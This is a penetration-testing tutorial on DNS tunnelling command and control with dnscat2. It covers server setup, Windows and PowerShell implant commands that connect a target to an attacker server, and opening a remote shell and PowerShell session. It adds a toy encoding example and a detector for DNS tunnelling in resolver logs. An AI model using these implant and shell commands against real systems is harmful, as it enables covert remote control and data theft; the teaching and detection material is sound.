Even in the most restricted environments, DNS traffic is usually allowed so that hosts can resolve internal and external domains. This makes DNS usable as a communication channel between a compromised host and a command and control server: commands and data are embedded inside DNS queries and responses, and detection is difficult because the tunnel hides among legitimate resolver traffic.

This technique can be implemented with dnscat2, which creates a command and control channel over the DNS protocol. The tool ships a client (implant) written in C that must be executed on the target so that the server receives a connection. Traffic is transmitted in encrypted form, and authentication is supported through a pre-shared secret.
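To make the mechanism concrete, here is an added example (not dnscat2's own code) of how a DNS tunnel carries data in both directions: the client hex-encodes chunks of a payload into subdomain labels of an attacker-controlled domain, and the server sends data back inside TXT record strings. The sequence-number label, the chunk sizes, the use of plain hex without encryption and the assumed domain "pentestlab" are illustration choices; dnscat2's real framing adds session identifiers, acknowledgements and encryption. No packets are sent; the server-side functions simply decode what the client-side functions produce.

```python
"""How a DNS tunnel smuggles data inside query names and TXT responses.

Added example for this article; it is not dnscat2's own code. The framing
(a sequence-number label), the chunk sizes and the use of plain hex without
encryption are assumptions made for this illustration. Nothing is sent on
the network: the "server" functions decode what the "client" functions made.
"""
import binascii

C2_DOMAIN = "pentestlab"   # domain used in the article's lab setup (assumption)
MAX_LABEL = 63             # RFC 1035: one label is at most 63 octets
MAX_NAME = 253             # RFC 1035: a whole name is at most 253 characters in text form
TXT_STRING = 255           # RFC 1035: one <character-string> in a TXT RR is at most 255 octets


def encode_queries(payload, seq_start=0):
    """Client side: split a payload into query names of the form
    <seq>.<hex>.<hex>.<C2_DOMAIN>, each carrying up to 63 bytes of data."""
    hexdata = binascii.hexlify(payload).decode()
    per_query = 2 * MAX_LABEL      # two full labels of hex per query (126 chars = 63 bytes)
    names = []
    for i in range(0, len(hexdata), per_query):
        piece = hexdata[i:i + per_query]
        labels = [piece[j:j + MAX_LABEL] for j in range(0, len(piece), MAX_LABEL)]
        name = ".".join([str(seq_start + len(names))] + labels + [C2_DOMAIN])
        if len(name) > MAX_NAME:   # cannot happen with these sizes; keeps the invariant explicit
            raise ValueError("query name too long")
        names.append(name)
    return names


def decode_queries(names):
    """Server side: ignore names outside our domain, reassemble by sequence number
    (queries may arrive out of order through recursive resolvers)."""
    pieces = {}
    for name in names:
        labels = name.rstrip(".").lower().split(".")
        if labels[-1] != C2_DOMAIN or len(labels) < 3 or not labels[0].isdigit():
            continue   # ordinary lookup, not tunnel traffic
        pieces[int(labels[0])] = "".join(labels[1:-1])
    return binascii.unhexlify("".join(pieces[seq] for seq in sorted(pieces)))


def encode_txt_response(data):
    """Server side: hex-encode the reply and split it into TXT character-strings
    of at most 255 octets (254 used so that each string holds whole bytes)."""
    hexdata = binascii.hexlify(data).decode()
    step = TXT_STRING - 1   # 254, even
    return [hexdata[i:i + step] for i in range(0, len(hexdata), step)]


def decode_txt_response(strings):
    """Client side: concatenate the character-strings and un-hex them."""
    return binascii.unhexlify("".join(strings))


if __name__ == "__main__":
    for query in encode_queries(b"whoami\n"):
        print("client resolves:", query)
    print("server answers TXT:", encode_txt_response(b"pentestlab\\user\n"))
```

Even this toy version shows why the conclusion of the article recommends watching query lengths: a single tunnel query is well over 100 characters of hex, far longer than the names most hosts ever resolve.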

The tool can be installed on a Kali Linux 2.0 machine with the commands below.

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
bundle install
Dnscat2 – Download and Installation

The command and control server can be started with the following command. In this lab the client is pointed directly at the server's IP address; in a real engagement the server must be the authoritative name server for the chosen domain (delegated with an NS record) so that recursive resolvers forward the queries to it. Both the server and the client also accept a --secret option for the pre-shared secret mentioned above.

ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.1.169" --no-cache
Dnscat2 – Server

A compiled version of the client (implant) for Windows systems can be downloaded directly from here. From the command prompt of the target, the only requirement is to specify the DNS server in order to establish a connection with the C2 (Command and Control) server. Specifying server= talks to the dnscat2 server directly rather than through the host's configured resolver; when the server is authoritative for the domain, the client can be given the domain name instead.

dnscat2-v0.07-client-win32.exe --dns server=192.168.1.169
Dnscat2 – Windows Client

From the dnscat2 server console, the red teamer can interact with the session that has been created:

session -i 1
Dnscat2 – Interactive Session

Executing “help” lists the available commands:

Dnscat2 – List of Commands

Among other functionality, dnscat2 can upload and download files, execute other programs and obtain a remote shell.

Obtaining a shell is easy with the “shell” command, which opens another session:

Dnscat2 – Shell

The following output appears on the command prompt of the target:

Dnscat2 – Command Shell Request

The shell is interactive and responsive, and all commands are transferred over DNS traffic:

Dnscat2 – Executing Shell Commands

Another program can be launched remotely by calling the executable:

exec notepad.exe
Dnscat2 – Start New Process

Luke Baggett developed a PowerShell version of the implant, introduced and described on the Black Hills Information Security (blackhillsinfosec) website. The commands are the same, but additional features have been added, such as an interactive PowerShell session and the ability to run scripts directly from memory.

The following command needs to be executed from a PowerShell session on the target; the domain must match the one the server was started with:

PS C:\> start-Dnscat2 -Domain pentestlab -DNSServer 192.168.1.169

It is also possible to establish a direct PowerShell session by running the following from the dnscat2 server console:

exec psh
Dnscat2 – PowerShell

A new console is created with the ability to execute PowerShell commands and scripts:

Dnscat2 – PowerShell Command

Conclusion

Command and control over DNS with dnscat2 has several advantages, among them:

  • Support of multiple sessions
  • Traffic encryption
  • Protection from man-in-the-middle attacks through a pre-shared secret
  • Run PowerShell scripts directly from memory
  • Stealthy

Since detection is difficult, because arbitrary commands are hidden behind legitimate DNS traffic, defenders should monitor the length and entropy of DNS query names, the volume of queries and of unique subdomains per domain, and the use of record types such as TXT, CNAME and MX from ordinary workstations, and should allow hosts to communicate only with trusted DNS servers.
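The following is an added detection example (not part of the original post or of dnscat2) that applies those monitoring recommendations to resolver query logs. The log format (timestamp, client, query type, query name), the constructed sample lines, the zone "pentestlab.test" and the thresholds are assumptions; the zone is approximated as the last two labels, which a production version should replace with a Public Suffix List lookup.

```python
"""Heuristic detection of DNS tunnelling from resolver query logs.

Added example for this article, not part of dnscat2 or the original post.
The log format, the sample lines and the thresholds are assumptions; tune
the thresholds against your own baseline before turning this into an alert.
"""
import math
from collections import defaultdict

# Record types dnscat2 can use for bulk data; many TXT/CNAME/MX lookups from
# a workstation are unusual on their own.
RARE_QTYPES = {"TXT", "CNAME", "MX", "NULL"}

LONG_LABEL = 40       # characters in a single label
LONG_NAME = 70        # characters in the whole query name
RARE_RATIO = 0.5      # share of queries using RARE_QTYPES
UNIQUE_RATIO = 0.8    # share of queries with a never-seen subdomain
HIGH_ENTROPY = 3.5    # bits per character of the subdomain part

# Constructed sample: normal lookups plus a burst of tunnel-style queries
# (long hex labels, unusual record types) under one zone, and one bad line.
SAMPLE_LOG = """\
2024-01-01T10:00:01 192.168.1.50 A www.example.com
2024-01-01T10:00:02 192.168.1.50 AAAA mail.example.com
2024-01-01T10:00:03 192.168.1.50 A cdn.static-content.example.net
2024-01-01T10:00:04 192.168.1.77 TXT 7a01d4e2a3f9c0b1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3.0a1f.pentestlab.test
2024-01-01T10:00:04 192.168.1.77 CNAME 3f8a1c0b2d4e6f8091a2b3c4d5e6f708192a3b4c5d6e7f80a1b2c3d4e5f6.0a20.pentestlab.test
2024-01-01T10:00:05 192.168.1.77 MX 9e8d7c6b5a49382716050f4e3d2c1b0a99887766554433221100ffeeddcc.0a21.pentestlab.test
2024-01-01T10:00:05 192.168.1.77 TXT 1122334455667788990011223344556677889900aabbccddeeff00112233.0a22.pentestlab.test
2024-01-01T10:00:06 192.168.1.50 A www.example.com
this line is malformed and is skipped
"""


def parse_log(text):
    """Parse 'timestamp client qtype qname' lines; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qtype, qname = parts
        records.append({"ts": ts, "client": client, "qtype": qtype.upper(),
                        "qname": qname.rstrip(".").lower()})
    return records


def shannon_entropy(s):
    """Bits per character; random hex tends towards 4, English words sit lower."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_zone(qname):
    """Return (subdomain_labels, zone). Assumption: the zone is the last two
    labels; production code should use the Public Suffix List instead."""
    labels = qname.split(".")
    if len(labels) <= 2:
        return [], qname
    return labels[:-2], ".".join(labels[-2:])


def score_zones(records, min_queries=4):
    """Group queries by zone and return {zone: [reasons]} for zones that hit
    at least two heuristics over at least min_queries queries."""
    per_zone = defaultdict(list)
    for rec in records:
        sub, zone = split_zone(rec["qname"])
        per_zone[zone].append((sub, rec))

    findings = {}
    for zone, items in per_zone.items():
        subs = [sub for sub, _ in items if sub]
        if len(items) < min_queries or not subs:
            continue
        max_label = max(len(label) for sub in subs for label in sub)
        max_name = max(len(rec["qname"]) for _, rec in items)
        unique_ratio = len({".".join(sub) for sub in subs}) / len(items)
        rare_ratio = sum(rec["qtype"] in RARE_QTYPES for _, rec in items) / len(items)
        mean_entropy = sum(shannon_entropy("".join(sub)) for sub in subs) / len(subs)

        reasons = []
        if max_label >= LONG_LABEL:
            reasons.append(f"long label ({max_label} chars)")
        if max_name >= LONG_NAME:
            reasons.append(f"long query name ({max_name} chars)")
        if rare_ratio > RARE_RATIO:
            reasons.append(f"unusual record types ({rare_ratio:.0%})")
        if unique_ratio >= UNIQUE_RATIO:
            reasons.append(f"mostly unique subdomains ({unique_ratio:.0%})")
        if mean_entropy >= HIGH_ENTROPY:
            reasons.append(f"high label entropy ({mean_entropy:.2f} bits)")
        if len(reasons) >= 2:   # one signal alone fires on CDNs and telemetry domains
            findings[zone] = reasons
    return findings


if __name__ == "__main__":
    for zone, reasons in score_zones(parse_log(SAMPLE_LOG)).items():
        print(zone, "->", "; ".join(reasons))
```

Requiring two independent signals matters: a content delivery network also produces many unique subdomains, and some legitimate services use long TXT lookups, so a single heuristic on its own generates noise. The query-count floor keeps one stray long name from paging anyone, while a real dnscat2 session produces a steady stream of queries even when idle.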

References

https://github.com/iagox86/dnscat2

https://github.com/lukebaggett/dnscat2-powershell

PowerShell DNS Command & Control with dnscat2-powershell
